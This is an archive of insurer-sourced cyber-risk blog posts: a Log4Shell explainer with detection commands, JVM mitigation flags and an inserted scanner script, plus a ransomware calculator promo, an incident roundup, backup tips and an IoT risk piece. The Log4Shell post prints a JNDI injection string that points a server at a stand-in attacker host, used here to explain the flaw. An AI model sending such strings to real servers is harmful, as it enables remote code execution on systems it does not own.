
Category Archives: Cyber Risk Management

Log4Shell Vulnerability

Log4Shell (CVE-2021-44228) is a critical vulnerability that has been actively exploited and scanned for by malicious actors since its discovery at the beginning of December. It enables attackers to run arbitrary code on servers running vulnerable versions of the Apache Log4j 2 library.

What is Log4j 2?

The Log4Shell vulnerability results from the way log4j2, an open-source logging library provided by the Apache Group and used by numerous projects, processes the contents of the messages it is asked to log.

An attacker can send a specially crafted message, which contains a link to a server they control. For example, they may send a message including the string ${jndi:ldap://evil.xa/x}, where ldap://evil.xa is the attacker-controlled server.

The specially crafted message is passed to the log4j library so it can be logged, but while processing it the library resolves the embedded lookup and queries the malicious server. The malicious server then responds with directory information, along with whatever code the attacker wants to execute on the victim server. Finally, the victim server downloads this response and executes the code it contains.

Some of the products known to use Log4j 2, and therefore exposed to this vulnerability, are:

Apache Druid
Apache Dubbo
Apache Flink
Apache Flume
Apache Hadoop
Apache Kafka
Apache Solr
Apache Spark
Apache Struts
Apache Tapestry
Apache Wicket
Elastic Elasticsearch
Elastic Logstash
Ghidra
Grails
Minecraft
Apache Tomcat
Dropwizard
Elastic Kibana
Hibernate
JavaServer Faces
Oracle ATG Web Commerce
Spring Framework

Why is this critical?

The vulnerability itself allows an attacker to load arbitrary – potentially malicious – code into the target server. This code might add a backdoor to a server, cryptojack or even carry out a ransomware attack.

The vulnerability was published earlier in December alongside a working proof-of-concept that would enable malicious actors to exploit it.

How to mitigate?

To mitigate against this vulnerability, we recommend installing the latest updates (2.15.0 or later), and the regular and timely updating of any affected third-party software. This should be done on all devices, not only those directly exposed to the internet.

To support the first priority action above, you should also determine whether Log4j is installed elsewhere. Java applications can bundle all of their dependent libraries within their installation, so you should search the file system for log4j, including inside EAR, JAR and WAR files, e.g.:

find / -type f -print0 |xargs -n1 -0 zipgrep -i log4j2 2>/dev/null

If a dependency or package manager is used, this can be searched. For example:

dpkg -l | grep log4j

There could be multiple copies of Log4j present and each copy will need to be updated or mitigated.
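As an added example, not code from the article or from CFC: once the search above has produced candidate files, a scanner like the following can open each JAR/WAR/EAR, recurse into archives bundled inside it, and flag any log4j-core whose recorded version is below 2.15.0 (or whose version cannot be read at all). The fake_archive helper builds constructed sample archives so the scanner can be tried offline; the class and pom.properties paths it checks are assumptions about log4j-core's layout.

```python
import io
import re
import zipfile
from pathlib import Path

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"  # what makes log4j-core exploitable
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"  # records its version
FIXED = (2, 15, 0)  # the article's "2.15.0 or later"
ARCHIVES = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """Pull MAJOR.MINOR.PATCH out of the 'version=' line of pom.properties."""
    m = re.search(r"^version=(\d+)\.(\d+)\.(\d+)", text, re.MULTILINE)
    return tuple(int(x) for x in m.groups()) if m else None


def inspect_archive(data, where):
    """Return (location, version, vulnerable) tuples, recursing into nested jars/wars/ears."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        if JNDI_CLASS in names:
            version = parse_version(zf.read(POM_PROPS).decode()) if POM_PROPS in names else None
            findings.append((where, version, version is None or version < FIXED))  # unknown => vulnerable
        for name in names:
            if name.lower().endswith(ARCHIVES):  # e.g. a jar bundled under WEB-INF/lib of a war
                findings += inspect_archive(zf.read(name), f"{where}!{name}")
    return findings


def scan_tree(root):
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in ARCHIVES:
            try:
                findings += inspect_archive(path.read_bytes(), str(path))
            except zipfile.BadZipFile:  # suffix says jar, but the file is not a zip
                continue
    return findings


def fake_archive(version, wrap_in_war=False):
    """Constructed sample mimicking log4j-core's layout, optionally bundled inside a war."""
    def zipped(entries):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            for name, body in entries.items():
                zf.writestr(name, body)
        return buf.getvalue()
    jar = zipped({POM_PROPS: f"version={version}\n", JNDI_CLASS: b"\xca\xfe\xba\xbe"})
    return zipped({"WEB-INF/lib/log4j-core.jar": jar}) if wrap_in_war else jar
```

Run scan_tree("/") on a host to list every copy found, including those nested inside deployed applications; each location reported as vulnerable needs updating or mitigating separately.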

If updating Log4j 2 is not feasible, this vulnerability can still be mitigated by setting the system property “log4j2.formatMsgNoLookups” to “true”. This can be done by restarting the Java service with the following argument:

java -Dlog4j2.formatMsgNoLookups=true …

or you can set an Environment Variable for the JVM arguments:

JAVA_OPTS=-Dlog4j2.formatMsgNoLookups=true

Please contact your IT department with any questions on updates needed.

Source: www.cfcunderwriting.com

How Much Could Ransomware Cost Your Client?

CFC’s new tool helps you find the answer.

Ransomware attacks are a disproportionately expensive type of cyber event, accounting for 81% of all cyber-related losses last year. But how much it costs an individual business depends on their industry sector and size as well as a number of other factors, from how long they were out of action to whether sensitive data was stolen.

Built from data analysis relating to thousands of cyber events handled by CFC, this new tool gives users low, medium, and high severity ransomware loss estimates based on just four simple pieces of business information. It also generates a bespoke, downloadable report explaining the methodology used.

Try it out and help your clients get to grips with the single biggest cyber threat facing their business today.

Click here to enter CFC’s brand new ransomware calculator.

Source: www.cfcunderwriting.com


September Cyber Incidents

It’s been busy in the world of cyber risk, and September is no exception. In the past month, we’ve seen big players like Apple and Microsoft suffer zero-day vulnerabilities as well as ransomware continuing to wreak havoc across the globe.

  1. The return of the REvil ransomware group

    The REvil ransomware gang has returned and is attacking new victims and publishing their stolen files.

    Following a massive attack on July 2nd, which exploited a zero-day vulnerability in the Kaseya VSA platform to encrypt 60 managed service providers and over 1,500 businesses, REvil shut down their infrastructure and completely disappeared. The attack’s impact was felt worldwide, bringing the attention of international law enforcement, and the REvil gang suddenly shut down on July 13th.

    To everyone’s surprise, the REvil ransomware gang came back to life on 7th September under the same name when the Tor payment/negotiation and data leak sites suddenly turned back on and became accessible. Proof of new attacks emerged on September 9th when someone uploaded a new REvil ransomware sample compiled on September 4th to VirusTotal. On September 11th, the group published screenshots of stolen data for a new victim on their data leak site.

  2. Windows MSHTML zero-day exploits shared between attackers

    Threat actors are sharing Windows MSHTML zero-day (CVE-2021-40444) tutorials and exploits on hacking forums, allowing other hackers to start exploiting the new vulnerability in their own attacks.

    On 7th September, Microsoft disclosed a new zero-day vulnerability in Windows MSHTML that allows threat actors to create malicious documents, including Office and RTF docs, to execute commands on a victim’s computer remotely. After the vulnerability was disclosed, Microsoft Defender and other security programs were configured to detect and block parts of this attack.

    While these mitigations will help, the exploit has since been modified so that it no longer uses ActiveX controls, so users remain at risk until an official security update is released. Until Microsoft releases a security update, everyone should treat all Word and RTF attachments with suspicion and manually verify their source before opening them.

  3. Olympus hit with BlackMatter ransomware

    Olympus, a leading medical technology company, is investigating a “potential cybersecurity incident” that impacted some of its EMEA IT systems last week. Olympus has more than 31,000 employees worldwide and over 100 years of history developing for the medical, life sciences, and industrial equipment industries.

    While Olympus did not share any details on the attackers’ identity, ransom notes left on systems impacted during the breach point to a BlackMatter ransomware attack. The same ransom notes also point to a Tor website the BlackMatter gang has used in the past to communicate with victims.

  4. Apple patches zero-day flaw exploited by NSO Group

    Apple has released security updates for a zero-day vulnerability that affects every iPhone, iPad, Mac and Apple Watch. Citizen Lab, which discovered the vulnerability and was credited with the find, urges users to immediately update their devices.

    Citizen Lab said it has now discovered new artifacts of the ForcedEntry vulnerability, which it first revealed in August as part of an investigation.

    This exploit is significant because it breaks through new iPhone defences that Apple had baked into iOS 14, dubbed BlastDoor, which were supposed to prevent silent attacks by filtering potentially malicious code. Citizen Lab calls this exploit ForcedEntry for its ability to skirt Apple’s BlastDoor protections.

    Citizen Lab said it attributes the ForcedEntry exploit to NSO Group with high confidence, citing evidence it has seen that it has not previously published.

Source: www.cfcunderwriting.com


Cyber Tips: Backup Policies

Data is the most valuable part of a computer system and may be irreplaceable if lost to a ransomware attack or a hardware failure, or if it becomes corrupted. The following tips will assist you in planning and preparing a backup policy so that you are ready if the worst happens.

What is a backup policy?

A backup policy is a well-thought-out plan to mitigate against data loss that could happen due to a ransomware attack, hardware failure, data corruption, or some other detrimental event. If implemented well, it can help an organization to return to business as usual more quickly and easily.

The complexity of the backup policy will depend on the size of the organization, the number of applications and databases it uses, and the quantity of data that requires backing up. It will also depend on company policy and regulatory obligations applicable to the organization.

How do I implement backup policy best practice?

1. Identify your most critical data and plan accordingly

By identifying the most critical data to your business, resources can be allocated to ensure that this data is protected and prioritized. Backups can be tailored to that particular data accordingly.

2. Take frequent backups

If you have mission-critical data, then attention should be paid to the frequency of the backups that are taken.

3. Use the 3-2-1 approach to backups

Create three copies of your data in addition to the original file, using two different backup media types stored locally and one copy stored remotely offsite.

Backups should be isolated or air-gapped from the network when not actively backing up data. Backup media should never be permanently connected, either physically or over the network.

4. Employ versioning to data

Backups should contain old versions of your data, not just current versions of files backed up most recently. This is important in case of file corruption or ransomware that may be lurking in current data backups.

5. Periodically test the integrity of your backups

Data should be checked regularly to ensure that it is accessible and readable.

Other considerations for your backup policy

o  Data should be encrypted when backed up. This will help prevent unauthorized access.

o  Consider making your backups immutable, so they cannot be altered by you or the bad actors.

o  Consider using remote storage. Cloud based storage can be a cost-effective option if managed correctly.

o  Automate backups where possible. This will make the practice of backing up your data a part of everyday business.

o  Consider the retention period for your backups. This is especially important if you are using cloud services to back up your data. Cloud data storage costs can mount up, so determine a sensible length of time for storage in your backup policy, taking legal and regulatory obligations into account.

o  Consider your data retention policy. Do you actually need all the data that you are storing and backing up? Data is often stored unnecessarily, adding avoidable cost and an additional security burden if it is exposed.

Source: www.cfcunderwriting.com


What is the Internet of Things?

Dongles, Fitbits, Alexa, smart watches and more – we are all familiar with these handy pieces of tech. With ever-increasing functionality and user hype, the Internet of Things (IoT) is no doubt a growth market. But what defines IoT? How did we get here? What are the risks? And how much further can this tech go?

What is IoT?

It is estimated that there are a staggering 31 billion IoT devices online, but what exactly are they? The IoT refers to devices with embedded technologies that allow them to exchange data with other devices and systems over the Internet. An example of this is a smart home equipped with various interconnected devices (e.g., smart lighting, smart thermostats etc.) that can be controlled from a single app or device. Being able to turn on the heating and launch your favourite playlist before you have even set foot in your home, all from your phone, is surely not a bad thing.

IoT devices are also being deployed increasingly for commercial application. A study in the US estimates that 35% of manufacturers utilize IoT sensors within their manufacturing processes. Sensors can track parts as they move through the assembly line, giving process engineers improved oversight compared to traditional methods. This increased transparency can drive down costs for manufacturers and improve their bottom line.

How did we get here?

Technology companies have been trying to connect devices to the Internet for well over 40 years, with one of the first examples being a vending machine in the 1980s. This allowed the vending machine to report on its inventory and whether or not drinks were cold. For many reasons early attempts to develop this technology were largely unsuccessful. This quickly changed with the advent of smaller, cheaper to produce chips that could efficiently connect devices to the Internet. By 1999, technology pioneer Kevin Ashton had coined the phrase “Internet of Things”.

What are the key exposures for IoT devices?

Cyber vulnerabilities: Given their size, it is often hard to integrate robust cyber defences into IoT devices to fend off hackers. Once a hacker gains access, they can infiltrate the network the smart device is connected to. In what sounds like a Hollywood blockbuster movie, hackers managed to gain access to a casino’s network via a smart thermometer located in the fish tank, walking away with 10 gigabytes of the casino’s data – not quite suitcases of cash but just as valuable!

Intellectual property exposure: IoT is a competitive market with many large companies fighting for market share, but with this comes the very real potential for IP litigation. In particular, the complex nature of IoT can mean that companies can unknowingly infringe patented inventions and risk IP infringement allegations from competitors.

Bodily injury and property damage: Given the fact that IoT involves physical devices, there is an inherent exposure to bodily injury/property damage when compared to a non-hardware-based technology. For instance, the FDA had to recall 500,000 pacemakers in 2017 after concerns around cyber vulnerabilities which could be exploited to drain the battery or alter the heartbeat. The recall did not involve replacement of the pacemakers. Instead, medical staff were able to patch the security holes. Nonetheless, this highlights our reliance on IoT for critical functions and the potential for catastrophic loss.

What does the future look like for this growth area?

It is safe to say that the number of IoT devices will only increase and their functionality will also become more sophisticated. For better or worse, IoT is here to stay. Here are a couple of ways IoT may change the world in the coming years:

The idea of a “smart home” is something we are familiar with, but the idea of a “smart city” is still being developed. IoT has the potential to change the way we interact with the cities we inhabit. Smart cities will use a host of IoT devices to collect data using sensors, which can then be analyzed to improve health services, transport infrastructure and other services.

Farming is one of the oldest industries in the world, and while it has grown leaps and bounds from the days of horse-drawn farming, IoT has the ability to further modernize the sector. For example, sensors can be used to monitor weather conditions, livestock, agricultural drones and assist with crop management. Smart farms can drive efficiencies and bring down costs, making farming more profitable and environmentally friendly.

Global research firm Gartner estimates that by 2025 there will be 75 billion IoT devices connected to the Internet. The rapid rise of the number of units in circulation and the ever-increasing functionality of IoT brings with it increased exposures and risks.

Companies developing, manufacturing, or selling these devices need a comprehensive insurance policy to cover their exposures. CFC has a dedicated technology policy and an inhouse team of claims experts to deal with any issues that may arise. For more information, please contact ABEX or CFC.

Source: www.cfcunderwriting.com

